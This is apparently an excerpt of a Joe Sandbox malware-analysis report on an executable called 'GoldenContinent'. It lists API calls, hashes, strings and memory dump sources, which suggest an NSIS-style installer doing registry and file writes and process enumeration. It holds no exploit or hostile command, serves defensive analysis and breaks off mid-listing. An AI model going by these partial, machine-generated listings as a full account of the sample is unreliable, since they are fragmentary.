                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                            • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                              • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                            • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                            • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                            • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                            • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                              • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                            • String ID: F$N$open
                                                                                                                                                                                                                                                                            • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                            • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                            • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                              • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                            • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                            • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                            • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                            • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                            • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                            • String ID: F
                                                                                                                                                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                            • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                            • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                            • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                            • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                            • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                            • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                            • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                            • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                            • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                            • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                            • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                            • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                            • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                            • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                            • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                            • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                            • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                            • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                            • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00429E6D,74DF23A0,00000000), ref: 00404FD6
